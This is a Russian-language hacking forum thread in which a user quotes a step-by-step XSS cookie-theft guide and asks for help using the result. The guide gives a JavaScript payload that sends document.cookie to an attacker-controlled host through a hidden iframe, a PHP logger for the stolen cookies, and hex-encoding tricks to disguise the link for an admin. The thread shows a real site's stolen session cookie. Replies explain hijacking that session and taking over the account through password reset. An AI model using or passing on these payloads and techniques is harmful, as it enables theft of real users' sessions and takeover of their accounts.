Помогите разобраться!!!

hash · 18 Jan 2009

Привет онлайновые духи), на одном из форумов посвященных хеку нашел такой способ кражи куков:

Автор: Jenizix
Ну найти в интернете описание XSS-бага я думаю труда не составит... Перейдем сразу к использованию:
-= 3-2-1 go! =-
Сначала зарегистрируем ( или возьмем имеющийся ) домен с хостингом ( пофиг какого уровня =)))) ) с поддержкой PHP... допустим мы зарегили xss.host.ru... Создадим файл xss.js с таким содержимым:
CODE document.write('<iframe width=1 height=1 style="position: absolute; visibility: hidden;" src="'+'http://xss.host.ru/xss.php'+'?['+location.host+']:'+document.cookie+'"></iframe>');
Этот JavаScript будет открывать невидимый iframe на странице, в котором будет гризиться наш скрипт принимающий куки... + ему будет передаваться имя сайта откуда куки были стырены.
Я выбрал тег <iframe> т.к. у некоторых отключен показ рисунков => тег <img> не прокатит... да и попапы могут резаться...
Теперь создадим файл xss.php:CODE <? $file = fopen("cookies","a"); fputs($file,"[".date("d.m.y H:i")."]".$QUERY_STRING."\r\n"); fclose($file); ?>
Этот скрипт будет записывать дату и полученое "печенье" в файл cookies Закинем оба файла в веб-директорию нашего сайта... ну вощем чтоб они были доступны как http://xss.host.ru/xss.js и http://xss.host.ru/xss.php
-= Боевые действия =-
Ну теперь найдем бажный сайт с XSS уязвимостью. Допустим уязвимость будет тут: http://site.ru/find.php?find=[xss] ок. уязвимость есть. пошлем скрипту find.php запрос типа find.php?find=<script src=http://xss.host.ru/xss.js></script> и затем открываем http://xss.host.ru/cookies и видим стырены куки! =)))
-= Шифруемся =-
НО! В открытую этот линк кидать не стоит... палевно... сделаем так, напишем php-скрипт для кодировки символов в hex и для разкодировки из hex: hex.php:
CODE <? $str = urldecode($_SERVER['QUERY_STRING']); for($i=0;$i<strlen($str);$i++) { $hex=dechex(ord($str[$i])); if($str[$i]=='&') echo "$str[$i]"; else echo "%$hex"; } ?> ну и unhex.php:CODE <? echo urldecode($_SERVER['QUERY_STRING']); ?> например нам нужно чтобы юзер прошелся по этой ссылке: http://site.ru/find.php?find=<script src=http://xss.host.ru/xss.js></script> но как я уже говорил, в открытую ее ему кидать - палевно... заюзаем наш hex.php: http://xss.host.ru/hex.php?<script src=http://xss.host.ru/xss.js></script>
Получим вот что: %3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%70%3a%2f%2f%78%73%73%2e %68%6f%73%74%2e%72%75%2f%78%73%73%2e%6a%73%3e%3c%2f%73%63%72%69%70%74 %3e
это hex представление текста: <script src=http://xss.host.ru/xss.js></script> Теперь наша ссылка будет выглядеть вот так:
QUOTE http://site.ru/find.php?find=%3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%70%3a%2f%2f%78%73%73%2e %68%6f%73%74%2e%72%75%2f%78%73%73%2e%6a%73%3e%3c%2f%73%63%72%69%70%74 %3e
Как видите, не очень и палиться =))) Теперь осталось скинуть этот линк какомунибудь юзеру ( а лучше админу ) сайта site.ru и ждать его куков ( если конечно они там юзаются )... Куки могут быть в hex-виде... тут нам придет на помощ unhex.php: http://xss.host.ru/unhex.php?[тут_куки]
-= Подводим итоги =-
Теперь у нас есть полноценные скрипты для проведения XSS-атаки. Еще можно наш xss.js прогнать через hex.php чтоб еще побольше обезопаситься )))
Click to expand...

Так вот нашел бажный сайт, проделавши все вышесказанное, в фаиле cookies приходят только вот такие пиченки 18.01.09 09:34][www.bgsha.com]:BG..._COM_LOGIN=red-white;%20PHPSESSID=e0f723cb0615e9dc96432a0edae123f1;%20BGSHA_COM_GUEST_ID=158115;%20BGSHA_COM_LAST_VISIT=18.01.2009+12%3A30%3A52 ВОТ ВОПРОС: Как мы видим логин юзверя пришел но где хеш с пасом? Может тут код какой подправить нужо или может что я не так сделал? Помогите разобратьсь!!!

Pashkela · 18 Jan 2009

На очень многих форумах в куки пишется только сессия. Она тебе и прилетела

PHPSESSID=e0f723cb0615e9dc96432a0edae123f

И логин прилетел. Тебе просто надо поставить все это себе в куки, f5 - и ты станешь red-white по идее. Потом, допустим, из формы "Забыл пароль, выслать на почту", предварительно сменив почту в профайле на свою, выслать себе пароль (при условии - проверить!!! - что пароль не генерица новый, а просто высылается старый). При соблюдении этих условий, если ты получил пароль, поменяй почту обратно на старую. При любых других вариантах просто сможешь лазить по форуму под этим ником, пока сессия не кончится

hash · 18 Jan 2009

Pashkela said:

На очень многих форумах в куки пишется только сессия. Она тебе и прилетела

PHPSESSID=e0f723cb0615e9dc96432a0edae123f
Тебе просто надо поставить все это себе в куки, f5 - и ты станешь red-white по идее. Потом, допустим, из формы "Забыл пароль, выслать на почту", предварительно сменив почту в профайле на свою, выслать себе пароль (при условии - проверить!!! - что пароль не генерица новый, а просто высылается старый). При соблюдении этих условий, если ты получил пароль, поменяй почту обратно на старую. При любых других вариантах просто сможешь лазить по форуму под этим ником, пока сессия не кончится
Click to expand...

Можно поточнее, эту сесию мне вставить вместо своей к примеру, и перезагрузить страниуцу, я так понял??? Остальное вроде ясно...

Pashkela · 18 Jan 2009

Да, всё так, не просто сессию, а все куки, что прилетели, заменить, т.е. имя, время и т.д. Читай "XSS для новичков"

https://forum.antichat.ru/thread20140.html

hash · 18 Jan 2009

Поробовал подставить, пишет: You don't have permission to access /; PHPSESSID=e0f723cb0615e9dc96432a0edae123f1; BG...._COM_GUEST_ID=158115; BGSHA_COM_LAST_VISIT=18.01.2009+12:31:54 on this server
доступ запрещен типа к этой сессии, опесни пож как ты ил виду "подставить сесию" раскажи подробнее.. пож

AkyHa_MaTaTa · 18 Jan 2009

по всей видимости там идет привязка сесси к ip

Pashkela · 18 Jan 2009

Сессии имеют время жизни в том числе. Т.е. смысл в том, чтобы сработало, в большинстве случаев надо действовать быстро. Сессии могут обновляться раз в полчаса

hash · 18 Jan 2009

Так можно, что нить сделать с этими сессиями или это бесполезно?

Pashkela · 18 Jan 2009

https://forum.antichat.ru/thread20140.html

всё, вопрос закрыт. Читай ссылку. Всё и так разжевали

nikbim96 · 1 Mar 2015

Не знаю актуальна ли ещё тема но я так мельком глянул сайт судя по всему он на бетриксе который давненько не обновлялся, есть там парочка моментов на которые стоит обратить внимание админам сайта. Например на password transmitted over http уязвимость... Эта уязвимость в авторизации которая на нём имеется. тут о ней можно почитать http://forum.antichat.ru/thread58123.html

Помогите разобраться!!!

hash New Member

Pashkela Динозавр

hash New Member

Pashkela Динозавр

hash New Member

AkyHa_MaTaTa Elder - Старейшина

Pashkela Динозавр

hash New Member

Pashkela Динозавр

nikbim96 Member

Useful Searches

Помогите разобраться!!!

hash New Member

Pashkela Динозавр

hash New Member

Pashkela Динозавр

hash New Member

AkyHa_MaTaTa Elder - Старейшина

Pashkela Динозавр

hash New Member

Pashkela Динозавр

nikbim96 Member